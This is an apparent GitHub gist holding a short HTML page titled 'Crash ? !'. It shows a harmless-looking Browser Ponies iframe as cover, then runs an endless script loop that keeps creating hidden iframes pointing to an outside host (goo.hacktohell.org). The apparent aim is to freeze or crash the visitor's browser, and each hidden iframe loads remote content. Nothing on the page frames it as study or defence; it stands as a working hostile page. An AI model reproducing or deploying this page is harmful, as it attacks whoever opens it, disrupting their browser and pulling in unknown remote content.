Skip to content

Instantly share code, notes, and snippets.

@HackToHell
Last active August 29, 2015 14:01
Show Gist options
  • Save HackToHell/ac241f4c12e5deb72475 to your computer and use it in GitHub Desktop.
Save HackToHell/ac241f4c12e5deb72475 to your computer and use it in GitHub Desktop.
<html>
<head>
Crash ? !
</head>
<iframe src="http://panzi.github.io/Browser-Ponies/ponies-iframe.html#fadeDuration=500&volume=1&fps=25&speed=3&audioEnabled=false&showFps=false&showLoadProgress=true&speakProbability=0.15&paddock=true&grass=true" style="overflow:hidden;border-style:none;margin:0;padding:0;background:transparent;width:640px;490px;" width="640" height="490" frameborder="0" scrolling="no" marginheight="0" marginwidth="0"></iframe>
<script>
while(10>9){
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "http://goo.hacktohell.org/g.html";
document.body.appendChild(iframe);
}
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment